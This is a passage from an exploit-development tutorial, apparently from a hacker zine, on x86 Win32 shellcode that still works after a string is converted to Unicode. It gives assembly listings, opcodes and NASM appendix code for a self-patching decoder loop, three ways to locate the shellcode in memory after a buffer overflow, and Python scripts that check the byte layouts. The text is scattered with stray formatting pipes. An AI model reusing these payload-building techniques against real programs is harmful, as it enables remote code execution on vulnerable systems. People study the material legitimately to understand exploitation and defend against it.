Which does, with 'align' instruction {add [ebp+0x0],al} :
|
|
________________________________________________________________
|
|
|004500 add [ebp+0x0],al |
|
|
|C6008A mov byte [eax],0x8A ; 0x8A |
|
|
|004500 add [ebp+0x0],al |
|
|
| |
|
|
|40 inc eax |
|
|
|004500 add [ebp+0x0],al |
|
|
|40 inc eax |
|
|
|004500 add [ebp+0x0],al |
|
|
|C60058 mov byte [eax],0x58 ; 0x58 |
|
|
|004500 add [ebp+0x0],al |
|
|
| |
|
|
|40 inc eax |
|
|
|004500 add [ebp+0x0],al |
|
|
|40 inc eax |
|
|
|004500 add [ebp+0x0],al |
|
|
|C60014 mov byte [eax],0x14 ; 0x14 |
|
|
|004500 add [ebp+0x0],al |
|
|
| |
|
|
|40 inc eax |
|
|
|004500 add [ebp+0x0],al |
|
|
|40 inc eax |
|
|
|004500 add [ebp+0x0],al |
|
|
|C600E2 mov byte [eax],0xE2 ; 0xE2 |
|
|
|004500 add [ebp+0x0],al |
|
|
|40 inc eax |
|
|
|004500 add [ebp+0x0],al |
|
|
|________________________________________________________________|
|
|
|
|
This is good, we now have EAX that points to the end of the loop, that is
|
|
to say : the shellcode.
|
|
|
|
-> 3rd part : The loop code (stuffed with nulls of course)
|
|
________________________________________________________________
|
|
|43 db 0x43 |
|
|
|00 db 0x00 ; overwritten with 0x8A |
|
|
|14 db 0x14 |
|
|
|00 db 0x00 ; overwritten with 0x58 |
|
|
|88 db 0x88 |
|
|
|00 db 0x00 ; overwritten with 0x14 |
|
|
|18 db 0x18 |
|
|
|00 db 0x00 ; overwritten with 0xE2 |
|
|
|F7 db 0xF7 |
|
|
|________________________________________________________________|
|
|
|
|
Just after this should be placed the original working shellcode.
|
|
|
|
|
|
|
|
Let's count the size of this header : (nulls don't count of course)
|
|
|
|
1st part : 10 bytes
|
|
2nd part : 27 bytes
|
|
3rd part : 5 bytes
|
|
-------------------
|
|
Total : 42 bytes
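
The count can be double-checked from the hex listings of the three parts.
The sketch below only re-reads the bytes printed in the boxes above (with
0x5B, the standard encoding of pop ebx, in the first part); the helper
name payload_bytes is made up for this illustration.

```python
PART1 = "6A00 6A00 5B 004500 59 004500 BA00050041 00F5"
PART2 = ("004500 C6008A 004500 "
         "40 004500 40 004500 C60058 004500 "
         "40 004500 40 004500 C60014 004500 "
         "40 004500 40 004500 C600E2 004500 "
         "40 004500")
PART3 = "43 00 14 00 88 00 18 00 F7"


def payload_bytes(hex_listing: str) -> int:
    """Number of non-null bytes, i.e. bytes we actually have to send."""
    return sum(1 for b in bytes.fromhex(hex_listing) if b != 0)


sizes = [payload_bytes(part) for part in (PART1, PART2, PART3)]
stream = bytes.fromhex(PART1 + PART2 + PART3)

# The whole header must alternate: data byte, 00, data byte, 00, ...
alternates = all((b == 0) == (i % 2 == 1) for i, b in enumerate(stream))

print(sizes, sum(sizes), alternates)
```

The second check confirms that the three parts, placed end to end, still
form a valid "byte, null, byte, null" stream.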
|
|
|
|
I find this affordable, because I managed to make a remote Win32
shellcode fit in around 450 bytes.

So, in the end, we made it : a shellcode that works after it has been
turned into a Unicode string !
|
|
|
|
Is this really it ? No of course, we forgot something. I wrote that we
assumed that EAX was pointing to the exact first null byte of the loop
code. But to be honest with you, I have to explain a way to obtain this.
|
|
|
|
|
|
--[ 5 - Captain, we don't know our position !
|
|
|
|
|
|
The problem is simple : we had to perform patches on memory to get our loop
working. So we need to know our position in memory, because we are
patching ourselves.
In an assembly program, an easy way to do this would be :
|
|
|
|
________________________________________________________________
|
|
|call label |
|
|
| |
|
|
| label: |
|
|
|pop eax |
|
|
|________________________________________________________________|
|
|
|
|
Will get the absolute memory address of label in EAX.
|
|
|
|
In a classic shellcode we will need to do a call to a lower address
|
|
to avoid null bytes :
|
|
|
|
________________________________________________________________
|
|
|jmp jump_label |
|
|
| |
|
|
| call_label: |
|
|
|pop eax |
|
|
|push eax |
|
|
|ret |
|
|
| jump_label: |
|
|
|call call_label |
|
|
| ; **** |
|
|
|________________________________________________________________|
|
|
|
|
Will get the absolute memory address of '****'
|
|
|
|
But this is impossible in our case because we can neither jump nor call.
Moreover, we can't parse memory looking for a signature of any kind.
I'm sure there must be other ways to do this, but I could only think of 3 :
|
|
|
|
|
|
-> 1st idea : we are lucky.
|
|
|
|
If we are lucky, we can expect to have some registers pointing to a place
near our evil code. In fact, this will happen about 90% of the time. (The
program, before it crashed, must have used your data and so it must have
pointers to it.) This place can't be considered as hardcoded because it
will move along with the process memory, from one machine to another.
We know we can add anything to eax (only eax), so we can :
|
|
|
|
- use XCHG to have the approximate address in EAX
|
|
- then add a value to EAX, thus moving it to wherever we want.
|
|
|
|
The problem is that we can't use add al,r8 or add ah,r8 for this, because
an 8-bit addition does not carry into the rest of the register. Don't
forget that :
EAX=0x000000FF + add al,1 = EAX=0x00000000
So those manipulations will do different things depending on what EAX
contains.
|
|
|
|
So all we have is : add eax,0x??00??00
|
|
No problem, we can add 0x1200 (for example) to EAX with :
|
|
|
|
________________________________________________________________
|
|
|0500110001 add eax,0x01001100 |
|
|
|05000100FF add eax,0xFF000100 |
|
|
|________________________________________________________________|
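
Pairs of immediates like the one above can be found by a short search.
The sketch below is an illustration with assumptions of my own: the
function names are invented, arithmetic is done modulo 2^32 like the real
add, and an immediate is accepted only if its little-endian bytes read
00 ?? 00 ?? with both ?? non-null.

```python
MASK32 = 0xFFFFFFFF


def is_unicode_imm(value: int) -> bool:
    """True if the imm32 is stored as 00 ?? 00 ?? (?? != 00) after opcode 05."""
    b = value.to_bytes(4, "little")
    return b[0] == 0 and b[2] == 0 and b[1] != 0 and b[3] != 0


def split_delta(delta: int):
    """Find two usable immediates whose sum is `delta` modulo 2**32."""
    for hi in range(1, 256):
        for lo in range(1, 256):
            first = (hi << 24) | (lo << 8)
            second = (delta - first) & MASK32
            if is_unicode_imm(second):
                return first, second
    return None


# The pair used in the text.
assert (0x01001100 + 0xFF000100) & MASK32 == 0x1200

pair = split_delta(0x1200)
print([hex(v) for v in pair])
```

Not every delta can be reached this way: the low byte of the sum is
always 00, which is why some alignment padding is needed afterwards.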
|
|
|
|
Then, it is simple to add some align data so that EAX points on what we
|
|
want.
|
|
For example :
|
|
________________________________________________________________
|
|
|0400 add al,0x0 |
|
|
|________________________________________________________________|
|
|
|
|
would be perfect for alignment.
(N.B: we may need an extra inc eax to fit)
|
|
|
|
Some extra space may be required by this method (max : 128 bytes, because
we can only get EAX to point to the nearest address that is a multiple of
0x100, then we have to add align bytes. As each 2 bytes in memory is in
fact 1 buffer byte because of the added null bytes, we must at worst add
0x100 / 2 = 128 bytes)
|
|
|
|
|
|
-> 2nd idea : a little less lucky.
|
|
|
|
If you can't find a close address in your registers, you can maybe find
one on the stack. Let's just hope your ESP wasn't smashed by the overflow.
You just have to POP from the stack until you find a nice address. This
method can't be explained in a general way, but the stack always contains
addresses the application used before you bothered it. Note that you can
use POPAD to pop EDI, ESI, EBP, EBX, EDX, ECX, and EAX.
Then we use the same method as above.
|
|
|
|
|
|
|
|
-> 3rd idea : god forgive me.
|
|
|
|
Here we suppose we don't have any interesting register, or that the values
the registers contain change from one try to another. Moreover, there's
nothing interesting on the stack.

This is a desperate case so -> we use an old style samurai suicide attack.
|
|
|
|
My last idea is to :
|
|
|
|
- Take a "random" memory location that has write access
|
|
- Patch it with 3 bytes
|
|
- Call this location with a relative call
|
|
|
|
The first part is the most hazardous : we need to find an address that is
within a writeable section. We'd better find one at the end of a section
full of nulls or something like that, because we're gonna call quite
randomly. The easiest way to do this is to take, for example, the .data
section of the target Portable Executable. It is usually a quite large
section with Flags : Read/Write/Data.
So it is not a problem to kind of 'hardcode' an address in this area.
For the first step we just pick an address in the middle of it,
it won't matter where.
(N.B : if one of your registers points to a valid location after the
overflow, you don't have to do all this of course)
|
|
We assume the address is 0x004F1200 for example :
|
|
|
|
Using what we saw previously, it is easy to set EAX to this address :
|
|
________________________________________________________________
|
|
|B8004F00AA mov eax,0xAA004F00 ; EAX = 0xAA004F00 |
|
|
|50 push eax |
|
|
|4C dec esp |
|
|
|58 pop eax ; EAX = 0x004F00?? |
|
|
|B000 mov al,0x0 ; EAX = 0x004F0000 |
|
|
|B9001200AA mov ecx,0xAA001200 |
|
|
|00EC add ah,ch |
|
|
| ; finally : EAX = 0x004F1200 |
|
|
|________________________________________________________________|
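The byte shuffling in this sequence is easy to get wrong, so here is a
small Python model of it. The stack is a plain bytearray and 0xCC stands
for whatever unknown byte already sits below the pushed value; both are
assumptions of the model, not part of the original code :

```python
import struct

stack = bytearray(b"\xCC" * 16)   # 0xCC marks unknown leftover stack bytes
esp = 8                           # arbitrary starting offset in the model

eax = 0xAA004F00                                  # mov eax,0xAA004F00
esp -= 4                                          # push eax
stack[esp:esp + 4] = struct.pack("<I", eax)
esp -= 1                                          # dec esp
eax = struct.unpack_from("<I", stack, esp)[0]     # pop eax -> 0x004F00??
esp += 4
eax &= 0xFFFFFF00                                 # mov al,0x0
ecx = 0xAA001200                                  # mov ecx,0xAA001200
ch = (ecx >> 8) & 0xFF
ah = ((eax >> 8) + ch) & 0xFF                     # add ah,ch (8-bit, wraps)
eax = (eax & 0xFFFF00FF) | (ah << 8)

print(hex(eax))
```

The dec esp shifts the read window down by one byte, which is what drops
the unwanted 0xAA and moves 0x4F into the third byte of EAX.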
|
|
|
|
|
|
Then we will patch this writeable memory location with (guess what) :
|
|
________________________________________________________________
|
|
|pop eax |
|
|
|push eax |
|
|
|ret |
|
|
|________________________________________________________________|
|
|
|
|
Hex code of the patch : [58 50 C3]
|
|
|
|
This would give us, after we called this address, a pointer to our code in
|
|
EAX. This would be the end of the trouble. So let's patch this :
|
|
|
|
Remember that EAX contains the address we are patching. What we are going
to do is first patch with 58 00 C3 00, then move EAX 1 byte ahead and put
the last byte, 0x50, between the two others.
(N.B : don't forget that x86 is little-endian, so the dword 0x00C30058 is
stored in memory as 58 00 C3 00)
|
|
|
|
________________________________________________________________
|
|
|C7005800C300 mov dword [eax],0x00C30058 |
|
|
|40 inc eax |
|
|
|C60050 mov byte [eax],0x50 |
|
|
|________________________________________________________________|
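The resulting memory layout can be checked with a short Python model. The
8-byte bytearray stands in for the zero-filled writable area and eax is
an offset into it rather than a real address (both are simplifications
made for this sketch) :

```python
import struct

memory = bytearray(8)   # stand-in for the zero-filled writable area
eax = 0                 # offset of the patch inside that area

struct.pack_into("<I", memory, eax, 0x00C30058)   # mov dword [eax],0x00C30058
eax += 1                                          # inc eax
memory[eax] = 0x50                                # mov byte [eax],0x50

print(memory[:4].hex())
```

The first three bytes now read 58 50 C3, that is pop eax / push eax / ret,
and EAX is left pointing one byte past the start of the patch.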
|
|
|
|
Done with patching. Now we must call this location. I know I said that we
couldn't call anything, but this is a desperate case, so we use a
relative call :
|
|
|
|
________________________________________________________________
|
|
|E800??00!! call (here + 0x!!00??00) |
|
|
| (**) |
|
|
|________________________________________________________________|
|
|
|
|
In order to get this method working, you have to patch the end of a large
memory section containing nulls, for example. Then we can call anywhere in
the area, and execution will end up running our 3-byte code.
|
|
|
|
After this call, EAX will hold the address of (**). We are saved, because
we just need to add to EAX a value we can calculate : it is just the
difference between two offsets in our code. However, we can't use the
previous technique to add bytes to EAX, because we want to add less than
0x100, so we can't do the {add eax, imm32} stuff. Let's do something else :
|
|
|
|
add dword [eax], byte 0x??
|
|
|
|
is the key, because we can add a byte to a dword, this is perfect.
|
|
|
|
EAX points to (**), so we can use this memory location to build the new
EAX value and load it back into EAX. We assume we want to add 0x?? to eax.
(N.B : 0x?? can't be larger than 0x7F because the immediate in :
add dword [eax], byte 0x??
is sign-extended, so if you set a larger value, it will sub instead of
add. In that case add a whole 0x100 and some alignment to your code, but
this shouldn't happen as 42*2 bytes isn't large enough, i think)
|
|
________________________________________________________________
|
|
|0400 add al,0x0 ; the 0x04 will be overwritten|
|
|
|8900 mov [eax],eax |
|
|
|8300?? add dword [eax],byte 0x?? |
|
|
|8B00 mov eax,[eax] |
|
|
|________________________________________________________________|
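The sign-extension limit can be seen with a tiny Python model of the
83 /0 ib form of ADD. The base address used here is a made-up value for
(**), chosen only for the demonstration :

```python
MASK32 = 0xFFFFFFFF

def add_dword_imm8(dword, imm8):
    """Model of 'add dword [eax], byte imm8' (opcode 83 /0 ib).

    The 8-bit immediate is sign-extended to 32 bits before the add.
    """
    signed = imm8 - 0x100 if imm8 & 0x80 else imm8
    return (dword + signed) & MASK32

base = 0x0012F000                       # hypothetical address of (**)
forward = add_dword_imm8(base, 0x5A)    # moves forward by 0x5A
backward = add_dword_imm8(base, 0x80)   # 0x80 is -128, so this goes backward
print(hex(forward), hex(backward))
```

Any immediate from 0x01 to 0x7F moves the pointer forward, which covers
the 0x5A needed here.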
|
|
|
|
Everything is alright : we can make EAX point to the exact first null byte
of loop_code, as we wished.
We just need to calculate 0x?? (just count the bytes, including nulls,
between loop_code and the call, and you'll find 0x5A)
|
|
|
|
|
|
|
|
|
|
--[ 6 - Conclusion
|
|
|
|
Finally, we have built a unishellcode that won't be altered by a
str to unicode transformation.
I'm waiting for other ideas or techniques to perform this, i'm sure there
are plenty of things i haven't thought about.
|
|
|
|
|
|
|
|
Thanks to :
|
|
- NASM Compiler and disassembler (i like its style =)
|
|
- Datarescue IDA
|
|
- Numega SoftIce
|
|
- Intel and its processors
|
|
|
|
Documentation :
|
|
- http://www.intel.com for the official intel assembly doc
|
|
|
|
Greetings go to :
|
|
- rix, for showing us beautiful things in his articles
|
|
- Tomripley, who always helps me when i need him !
|
|
|
|
|
|
|
|
--[ 7 - Appendix : Code
|
|
|
|
|
|
For testing purposes, i give you a few lines of code to play with (NASM
style). It is not really a code sample, but i gathered all my examples so
that you don't have to look everywhere in my messy paper to find what you
need...
|
|
|
|
- main.asm ----------------------------------------------------------------
|
|
%include "\Nasm\include\language.inc"
|
|
|
|
[global main]
|
|
|
|
segment .code public use32
|
|
..start:
|
|
|
|
; *********************************************
|
|
; * Assuming EAX points to (*) (see below) *
|
|
; *********************************************
|
|
|
|
;
|
|
; Setting EBX to 0x00000000 and ECX to 0x00000500
|
|
;
|
|
push byte 00 ; 6A00
|
|
push byte 00 ; 6A00
|
|
pop ebx ; 5B
|
|
add [ebp+0x0],al ; 004500
|
|
pop ecx ; 59
|
|
add [ebp+0x0],al ; 004500
|
|
mov edx,0x41000500 ; BA00050041
|
|
add ch,dh ; 00F5
|
|
|
|
|
|
;
|
|
; Setting the loop_code
|
|
;
|
|
add [ebp+0x0],al ; 004500
|
|
mov byte [eax],0x8A ; C6008A
|
|
add [ebp+0x0],al ; 004500
|
|
|
|
inc eax ; 40
|
|
add [ebp+0x0],al ; 004500
|
|
inc eax ; 40
|
|
add [ebp+0x0],al ; 004500
|
|
mov byte [eax],0x58 ; C60058
|
|
add [ebp+0x0],al ; 004500
|
|
|
|
inc eax ; 40
|
|
add [ebp+0x0],al ; 004500
|
|
inc eax ; 40
|
|
add [ebp+0x0],al ; 004500
|
|
mov byte [eax],0x14 ; C60014
|
|
add [ebp+0x0],al ; 004500
|
|
|
|
inc eax ; 40
|
|
add [ebp+0x0],al ; 004500
|
|
inc eax ; 40
|
|
add [ebp+0x0],al ; 004500
|
|
mov byte [eax],0xE2 ; C600E2
|
|
add [ebp+0x0],al ; 004500
|
|
inc eax ; 40
|
|
add [ebp+0x0],al ; 004500
|
|
|
|
;
|
|
; Loop_code
|
|
;
|
|
|
|
db 0x43
|
|
db 0x00 ;0x8A (*)
|
|
db 0x14
|
|
db 0x00 ;0x58
|
|
db 0x88
|
|
db 0x00 ;0x14
|
|
db 0x18
|
|
db 0x00 ;0xE2
|
|
db 0xF7
|
|
|
|
; < Paste 'unicode' shellcode there >
|
|
|
|
-EOF-----------------------------------------------------------------------
|
|
|
|
Then the 3 methods to get EAX to point to the chosen code.
|
|
(N.B : The 'main' code is 42*2 = 84 bytes long)
|
|
|
|
- methode1.asm ------------------------------------------------------------
|
|
; *********************************************
|
|
; * Adjusts EAX (+ 0xXXYY bytes) *
|
|
; *********************************************
|
|
|
|
; N.B : 0xXX != 0x00
|
|
|
|
add eax,0x0100XX00 ; 0500XX0001
|
|
add [ebp+0x0],al ; 004500
|
|
add eax,0xFF000100 ; 05000100FF
|
|
add [ebp+0x0],al ; 004500
|
|
|
|
; we added 0x(XX+1)00 to EAX
|
|
|
|
; using : add al,0x0 as a NOP instruction :
|
|
add al,0x0 ; 0400
|
|
add al,0x0 ; 0400
|
|
add al,0x0 ; 0400
|
|
; [...] <-- (0x100 - 0xYY) /2 times
|
|
add al,0x0 ; 0400
|
|
add al,0x0 ; 0400
|
|
add al,0x0 ; 0400
|
|
|
|
; (N.B) if 0xYY is odd then add a :
|
|
dec eax ; 48
|
|
add [ebp+0x0],al ; 004500
|
|
-EOF-----------------------------------------------------------------------
|
|
|
|
|
|
|
|
- methode2.asm ------------------------------------------------------------
|
|
; *********************************************
|
|
; * Basically : POPs and XCHG *
|
|
; *********************************************
|
|
|
|
popad ; 61
|
|
add [ebp+0x0],al ; 004500
|
|
xchg eax, ? ; 1 non null byte (find out what to do here)
|
|
add [ebp+0x0],al ; 004500
|
|
|
|
; do it again if needed, then use methode1 to make everything okay
|
|
-EOF-----------------------------------------------------------------------
|
|
|
|
|
|
|
|
- methode3.asm ------------------------------------------------------------
|
|
; *********************************************
|
|
; * Using a CALL *
|
|
; *********************************************
|
|
|
|
; Get the wanted address
|
|
|
|
mov eax,0xAA00??00 ; B800??00AA
|
|
add [ebp+0x0],al ; 004500
|
|
push eax ; 50
|
|
add [ebp+0x0],al ; 004500
|
|
dec esp ; 4C
|
|
add [ebp+0x0],al ; 004500
|
|
pop eax ; 58
|
|
add [ebp+0x0],al ; 004500
|
|
mov al,0x0 ; B000
|
|
mov ecx,0xAA00!!00 ; B900!!00AA
|
|
add ah,ch ; 00EC
|
|
add [ebp+0x0],al ; 004500
|
|
|
|
; EAX = 0x00??!!00
|
|
|
|
; awful patch, i agree
|
|
mov dword [eax],0x00C30058 ; C7005800C300
|
|
inc eax ; 40
|
|
add [ebp+0x0],al ; 004500
|
|
mov byte [eax],0x50 ; C60050
|
|
add [ebp+0x0],al ; 004500
|
|
|
|
; just pray and call
|
|
|
|
call 0x???????? ; E800!!00??
|
|
|
|
add [ebp+0x0],al ; 004500
|
|
|
|
; then add 90d = 0x5A to EAX (to reach (*), where the loop_code is)
|
|
; case where 0xXX = 0x00 so we can't use methode1
|
|
|
|
add al,0x0 ; 0400 because we're patching at [eax]
|
|
|
|
mov [eax],eax ; 8900
|
|
add dword [eax],byte 0x5A ; 83005A
|
|
add [ebp+0x0],al ; 004500
|
|
mov eax,[eax] ; 8B00
|
|
|
|
; EAX points to the very first null byte of loop_code
|
|
|
|
|
|
|=[ EOF ]=---------------------------------------------------------------=|
|
|
|